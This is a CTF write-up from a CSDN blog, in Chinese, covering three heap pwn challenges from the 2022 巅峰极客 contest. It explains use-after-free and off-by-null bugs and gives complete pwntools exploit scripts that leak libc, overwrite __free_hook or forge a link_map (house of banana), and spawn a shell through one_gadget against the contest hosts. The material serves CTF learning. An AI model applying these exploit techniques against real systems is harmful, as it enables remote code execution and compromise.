巅峰极客pwn wp

最新推荐文章于 2023-07-24 16:33:06 发布
最新推荐文章于 2023-07-24 16:33:06 发布
阅读量724 收藏 5
点赞数 3
分类专栏: wp 文章标签: ubuntu python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/126396402
版权

Pwn

gift

程序保护全开

程序功能:

  • add:最多只能申请十次堆块,每次申请大小为0x60或0x100,往里写内容的时候是往user_data+0x10处写。

  • delete:有UAF

  • show:可泄露

  • bargain:可以用来控制fd。并且类型为int,比较类型也是有符号比较,所以可以减0x10范围内的数字,或者加int(4字节内)的数字。

因为这道题idx太少了,直接free掉7个chunk填满tcache_list不可行,所以我是通过bargain函数修改fd指针到一个fake_chunk,这个fake_chunk大小属于unsortedbin范围,且可通过add一次0x60大小堆块修改到下一个已被free的0x100大小tcache去改掉它的next指针。

这样的话不仅可以泄露unsorted bin 的fd,还可以顺带改掉下一个已经被free掉的tcache的fd,实现tcache_dup

ps:这里也有个洞不过尝试了一下不好利用,在add里面mode选择3,会跳过malloc直接read:

[5MX`)__4R4ZAT[~}C)K)KM

问题出在,远程libc不确定,我最先尝试的是glibc 2.31 9.9free_hook五个ogg都失败(one_gadget -l2可以查看更多ogg)。因为idx原因也打不了malloc_hook,我打exit_hook成功了。

尝试远程之后寄。

后来尝试了2.29和2.27,在2.27成功。

EXP:

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/巅峰极客/gift/pwn')
libc = ELF('/mnt/hgfs/ubuntu/巅峰极客/gift/libc.so.6')
r = remote('101.200.85.91',44388)

def menu(choice):
    r.recvuntil(b"your choice:")
    r.sendline(str(choice))

def add(what,content):
    menu(2)
    r.recvuntil(b"your choice:")
    r.sendline(str(what))
    r.recvuntil(b"plz write your wish on your gift!")
    r.send(content)

def delete(idx):
    menu(3)
    r.recvuntil(b"index?")
    r.sendline(str(idx))

def show(idx):
    menu(4)
    r.recvuntil(b"index?")
    r.sendline(str(idx))

def bargain(idx,offset):
    menu(5)
    r.recvuntil(b"index?")
    r.sendline(str(idx))
    r.recvuntil(b"How much?")
    r.sendline(str(offset))



add(1,b'a'*0xc0+p64(0)+p64(0x451))#0
add(1,b'a'*8)#1
add(1,b'a'*8)#2
add(1,b'a'*8)#3
add(1,b'a'*0xd0+p64(0)+p64(0x21))#4



delete(0)

delete(2)
bargain(2,-0xe0)
add(1,b'a'*8)#5
add(1,b'a'*8)#6
delete(6)


show(6)
r.recvuntil(b'cost: ')
#-0x1ecba0
libc_base = int(r.recvuntil(b'\n')[:-1],10)-0x3ebca0
free_hook = libc_base+libc.symbols["__free_hook"]
# exit_hook = libc_base+0x218f68
# # system_addr = libc_base+0xe3cf6
one_gadget = libc_base+0x4f302
delete(3)
delete(1)
add(2,p64(free_hook-0x10)*8)#7
add(1,b'/bin/sh\x00')#8
add(1,p64(one_gadget))#9


# gdb.attach(r)
# menu(1)
delete(3)
# delete(3)
# show(6)
# r.recvuntil(b'cost: ')
# heap_addr =int(r.recvuntil(b'\n')[:-1],10)



# log.success("heap_addr: "+hex(heap_addr))
log.success("libc_base: "+hex(libc_base))
# gdb.attach(r)
r.interactive()

smallcontainer

2.27的off by null,感觉没什么好说的。

洞出在这里:

edit后会触发check函数:如果堆块内容连续(不带\x00),遇到堆块内容中含有\x11的字节就会转变为0。

2I)P]6F9@G}QZ)82D((EJLI

最开始打算用0x111大小的堆块去off by null,后面发现填不满tcache_list,猪鼻了,然后改成0x211大小的,直接打就行。这道题也不用怎么解释了,夹心饼攻击就行。

EXP:

from pwn import *

context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# r = process('/mnt/hgfs/ubuntu/巅峰极客/container/smallcontainer')
r = remote('101.200.85.91',23533)
libc = ELF('/mnt/hgfs/ubuntu/巅峰极客/container/libc-2.27.so')

def menu(choice):
    r.recvuntil(b"> ")
    r.sendline(str(choice))

def add(size):
    menu(1)
    r.recvuntil(b"Input size: ")
    r.sendline(str(size))

def delete(idx):
    menu(2)
    r.recvuntil(b"Input index: ")
    r.sendline(str(idx))

def edit(idx,content):
    menu(3)
    r.recvuntil(b"Input index: ")
    r.sendline(str(idx))
    r.sendline(content)

def show(idx):
    menu(4)
    r.recvuntil(b"Input index: ")
    r.sendline(str(idx))

add(0x1f8)#0
add(0x110)#1
add(0x110)#2
[add(0x1f8) for i in range(8)]#3-10

[delete(j)for j in range(3,10)]
delete(0)
add(0x208)#0
add(0x208)#3
add(0x218)#4
edit(10,b'a'*0x1f8)
edit(10,b'a'*0x1f0+p64(0x1440))
edit(0,b'a'*0x1f0+p64(0)+p64(0x221))
delete(0)
[add(0x1f8) for k in range(7)]#5-9,11,12
delete(2)
add(0x1f8)#2
show(1)
libc_base = int(r.recv(12),16)-0x3ebca0
free_hook = libc_base+libc.symbols["__free_hook"]
add(0x1f8)#12
edit(12,b'a'*0x110+p64(0)+p64(0x121)+p64(free_hook))
add(0x110)#13
add(0x110)#14
one_gadget = libc_base+0x4f302
edit(14,p64(one_gadget))

log.success("libc_base: "+hex(libc_base))
# gdb.attach(r)
delete(2)
r.interactive()

happy_note

唯一一道稍微有意思的题。

Glibc 2.34 3.2,house of kiwi刚好在这个版本失效,只有一次UAF而且size限制<=0x200,所以打mp_,hosue of emma全不行。

一次UAF不是什么问题,可以分解成很多个UAF,但是限制了只有两次add机会,这就相当于限制死了我们只有一次UAF了。一次UAF是改不了guard的。

因此剩余的办法就只有两种:一种house of banana,一种house of apple2,house of apple3。

我选择的是house of banana。

先泄露heap,libc基址和实现任意写:

我的方法是先用0x200大小的堆块填充满tcache_list,然后UAF free掉一个堆块,将这个堆块分割成两个小的堆块(0x10和0x1e0),只有这样才能实现任意写,不然原大小(0x200)的tcache_list是满的,也无法通过malloc来清空 tcache_list

然后free掉0x10大小的堆块,泄露高版本保护指针的key,然后free两个大小0x1e0大小的堆块,通过UAF改掉其中一个的fd,实现任意写。(高版本对tcache count有检测,不能free一个改掉fd就申请两次实现任意写)。

拿到任意写之后,我的方法是传统house of banana,打rtld_global的第一个变量ns_load,然后伪造。没开沙盒可以直接getshell。

不过这道题直接打libc里的原有的banana结构体应该更好更简洁。

EXP:

from secrets import choice
from pwn import *

context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/巅峰极客/happy_note/happy_note')
r = remote('123.56.236.86',13397)
libc = ELF('/mnt/hgfs/ubuntu/巅峰极客/happy_note/libc.so.6')


def menu(choice):
    r.recvuntil(b">> ")
    r.sendline(str(choice))

def add(idx,size,choice):
    menu(1)
    r.recvuntil(b"Note size:")
    r.sendline(str(size))
    r.recvuntil(b"Choose a note:")
    r.sendline(str(idx))
    r.recvuntil(b"Choose a mode: [1] or [2]")
    r.sendline(str(choice))

def delete(idx):
    menu(2)
    r.recvuntil(b"Choose a note:")
    r.sendline(str(idx))

def edit(idx,content):
    menu(4)
    r.recvuntil(b"Choose a note:")
    r.sendline(str(idx))
    r.recvuntil(b"Edit your content:")
    r.send(content)

def show(idx):
    menu(3)
    r.recvuntil(b"Which one do you want to show?")
    r.sendline(str(idx))

def UAF(idx):
    menu(666)
    r.recvuntil(b"Choose a note:")
    r.sendline(str(idx))


[add(i,0x200,1)for i in range(9)]
[delete(j) for j in range(7)]#0-6
UAF(7)
show(7)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))-0x219cc0
add(0,0x10,1)
add(1,0x1e0,1)
add(2,0x1e0,1)
add(3,0x1e0,1)
delete(0)
show(7)
r.recvuntil(b'content: ')
key = u64(r.recvuntil(b'\n')[:-1].ljust(8,b'\0'))-1
heap_base = key*0x1000
delete(2)
delete(1)

rtld_global_addr = libc_base+0x25f040
edit(7,b'a'*0x20+p64(rtld_global_addr^(key+1)))
add(4,0x1e0,2)
add(5,0x1e0,2)
edit(5,p64(heap_base+0x1130)+p64(0x4))

ret_addr = libc_base+0x0000000000028a87
one_gadget = libc_base+0xeacec


fake_link_map_addr = heap_base + 0x1130
payload= p64(fake_link_map_addr + 0x20)+p64(0x61)
payload += p64(0) +  p64(libc_base + 0x2607d0) # l_next
payload += p64(0) + p64(fake_link_map_addr) # l_real
payload += p64(libc_base+libc.symbols["setcontext"]+61) # second call  rdx = the address of last call
payload += p64(ret_addr) # first call (fake_link_map_addr + 0x38)
payload += p64(one_gadget)

flag_addr = fake_link_map_addr + 0xe8

payload += p64(fake_link_map_addr + 0x40) # rsp
payload += p64(ret_addr) # rip
payload += b'./flag\x00\x00' # fake_link_map_addr + 0xe8
 
payload = payload.ljust(0x110, b'\x00')

payload += p64(fake_link_map_addr + 0x110) + p64(0x10) # l->l_info[26]  &  d_ptr = 0x10
payload += p64(fake_link_map_addr + 0x120) + p64(0x10) # l->l_info[28]  &  i = 0x10/8 = 2 => array[1] = l->l_addr + d_ptr + 8 => array[0] = l->l_addr + d_ptr


edit(4,payload)
edit(8,b'\x00'*0x128+p64(0x800000000))

log.success("heap_base: "+hex(heap_base))
log.success("libc_base: "+hex(libc_base))
# gdb.attach(r)
delete(0xb)
r.interactive()
Loτυs
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020巅峰极客wp
BIAUTUMN的博客
10-16 867
2020巅峰极客 巅峰极客是给开封市信网办做护网的时候打的比赛,所以比赛体验感并不好,简单写一下wp virus-re 代码分为三部分 以’-‘为间隔,将flag的第一部分转换为整型数字,并且满足后项-前项分别为[0x13,0x19,0x1a,0x1c]。最后一项为len(flag)-lastpos(’-’) 以’-'为间隔,将中间的字符串分别存储到road中 checkflag,即走四个20x…的迷宫,从s->d。以第1点存储的顺序,决定迷宫的顺序。通过确定后面的字符串顺序,前面的数字也会被确定。
2022巅峰极客PWN
山高路远
09-01 473
在泄露出堆地址之后,修改fd指针,指向0x70堆块的前0x10位置,然后将堆块分配过去,进行修改0x70的fd指针。想要达成任意写,如果是修改fd,这题又只有在申请堆块时才可以进行写堆块,那么就得申请三次才能达成,在次数紧张的情况下,我又没想到有其他布局可以节省泄露地址使用的次数,就想到了可以通过劫持 tcache bin,修改上面的内容,只需要两次就可以做到任意地址写,节省了一次。两次刚好足够,一次填写地址,一次分配堆块达成任意写,这次就不要再用0x70分配,透支了两次,已经坏掉了。
巅峰极客2022wp
Pysnow's Blog
08-27 819
巅峰极客2022wp
极客巅峰第二场wp
weixin_30471065的博客
08-26 241
已经更新 地址:https://www.o2oxy.cn/1749.html 转载于:https://www.cnblogs.com/liang2580/p/9538319.html
极客巅峰
九层台
09-02 476
栗子下载https://github.com/tower111/software.git Antidbg 搜索字符串找不到关键点,也没有命名很明显的函数。 找导入表看了一下,有GetMessageA函数,跟踪看一下。 void __stdcall __noreturn StartAddress(LPVOID lpThreadParameter) { struct tagMSG Ms...
[巅峰极客2023]wp复现
最新发布
leekos的博客,分享web安全相关知识~
07-24 673
简单的说,就是通过查询多个大的表,导致产生笛卡尔积,造成查询数量多,所以会产生延时的效果。没写出这题的原因,以为只能通过逃逸改变属性值,结果可以反序列化对象里的对象。都被过滤了,我们怎么才能够一边查询多表导致笛卡尔积,一边进行盲注呢?等等,普通的延时注入肯定不行,关键词都被ban了。对象的序列化字符串,由于对象成员变量的权限是。序列化后字符串的形式了,接下来我们只需要闭合。,这个是8进制的写法,然后编码之后就能转为。的字符,该字符不可见(也算作一个字符)可以重复14次,就逃逸出28个字符了,
巅峰极客(MISC)
weixin_33810006的博客
07-24 417
关于巅峰极客写一下wp吧 毕竟自己那么菜(留给以后的自己看吧QAQ) 这一篇主要是关于杂项的(不简单呀!自己太渣了) 第一题:签到题: 直接打开就可以看到答案:flag{the_greatest_geek} 下面是杂项的内容: warmup 用stegsolve.jar打开图片,Analyse→Data Extract,...
2019巅峰极客
qq_41509200的博客
10-20 542
1 2
2022巅峰极客WriteUp By EDISEC
qq_45603443的博客
08-29 1903
2022巅峰极客WriteUp By EDISEC
2019巅峰极客隐写
夜幕下的灯火阑珊的博客
11-29 329
题目为一张png图片 foremost分离得到一个docx文件和一个加密压缩包 docx文件分离可得flag.xml 打开flag.xml,一片空白,全选后发现有东西,应该是隐藏文字,复制下来用sublime打开 把点和横杠记录下来 .--..--..--.--...--....-.--..---.----.--..--..-...---.....--......--.--...--...-...
巅峰极客2022初赛 部分题解
weixin_51122085的博客
08-18 2326
巅峰极客2022初赛 部分题解
180721 逆向-极客巅峰(Re)
whklhhhh的博客
07-22 987
Reverse Simple Base-N IDA打开,从pdb路径可以leek出现一些信息 可以看到有Base32的字样,估计算法里可能会出现相关信息 继续加载 简单重命名一下,注释上一眼就能看出来的结构 change函数里对Input做了变换,然后下面与一段字符串进行比较 注意这个地方break出去是继续跑下面的代码,并不是直接结束 从插件显示的花括号对应可以看...
极客巅峰 2020 babyphp2(phar反序列化)
y0un9er
10-02 720
文章目录前言一、什么是 phar 反序列化1.三个条件2.生成 phar 文件的常见代码题目分析下载源码classes.php生成 phar 文件总结 前言 这题比赛的时候,我一脸懵逼,大佬提示才知道源码泄露。但是之前没做过 phar 反序列化的题,二脸懵逼。还好源码没删,自己搭建了环境,看着大佬们的wp复现一番。点击打开题目 VPS 20年12月10号过期,望见谅。 一、什么是 phar 反序列化 利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。phar简介 .
2020巅峰极客Crypto:tryrsa
weixin_44795952的博客
10-03 1136
写在前面 化简c1、c2的想法以及最后一步求q感谢:来梦桃子 原博客 题目 from secret import e1,e2,flag from Crypto.Util.number import * msg = bytes_to_long("=========Hint:e1="+str(3)+"=============") p = getPrime(512) q = getPrime(512) N = p*q print (N) print (pow(msg,3,N)) msg = bytes_t
报名通道开启!赛宁网安护航“巅峰极客”网络安全技能挑战赛
Cyberpeace的博客
07-10 222
2023“巅峰极客”网络安全技能挑战赛聚焦“极客荟萃 逐梦巅峰”主题,搭建专业网络安全交流平台,创新升级比赛赛制,设立更多类型奖励办法,分为“网络安全技能大赛”、“网络安全创新创业大赛”两组赛道同步进行,鼓励全国高校相关专业人才、创新创业企业、创客踊跃参与,共同实现新经济和网络安全产业的和谐稳定发展。“综合渗透赛”深度模拟真实网络环境,参赛队伍以攻击者的角度进行切入,通过信息收集、拓扑测绘、外网渗透、资产数据发现以及内网横向移动等多种方式,最终完成仿真环境的渗透过程。
第9届极客挑战赛 misc wp
MEniDEwo的博客
10-21 1834
1、题目链接:http://morse.game.sycsec.com/ 查看网页源码 看到源于flag的格式字符 SYC{--. . . -.- .- -.-. - .. --- -. .... .- ... -... . --. ..- -. } 摩尔斯电码,网上找翻译的,提交成功 2、签到题 关注SYC小组微信公众号“三叶草小组Syclover”,回复“我要flag”,不要迷路...
DSCTF pwn 部分wp
N1rvana的博客
07-15 632
DSCTF pwn wp
攻防世界 Pwn-guess
FUCKING12的博客
10-21 690
程序很奇怪,为什么要在这里面弄个stderr的指针,还没用,出于老油条的警觉,要仔细想想这里是否有兔子洞(doge),这里有个利用点,就是v4和v3只有0x10的距离,我们在比较的时候,就可以利用这个点,在v3输入0x10的垃圾数据后,后面就是stderr的地址,buf会和v4进行比较,那我们就可以一个字节一个字节的和stderr比较,如果对了,就执行后面的,没对,就重新输入,于是就可以爆破出stderr的地址。注意这个函数的 i 是在栈上的,我们可以通过输入v1来控制i的值,来达到栈溢出的目的,
2021 祥云杯 pwn-PassWordBox_ProVersion
z1r0的博客
10-16 225
这里就没有off by null了,size也只能是large bin的,那肯定就是large bin attack了,libc还是2.31的,所以笔者就直接用的ubuntu20.04自带的2.31做的。值得插一嘴的是这个key,笔者上一个free题是因为没注意\x00也会被计算,所以就造成了^ key的值不准确,这题笔者发现了这个问题后,就往后移了一个8字节,保证了key的准确性。这个函数将flags标志位设置为了1配合delete函数即可实现uaf功能。详写了2.31的large bin攻击手法。
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值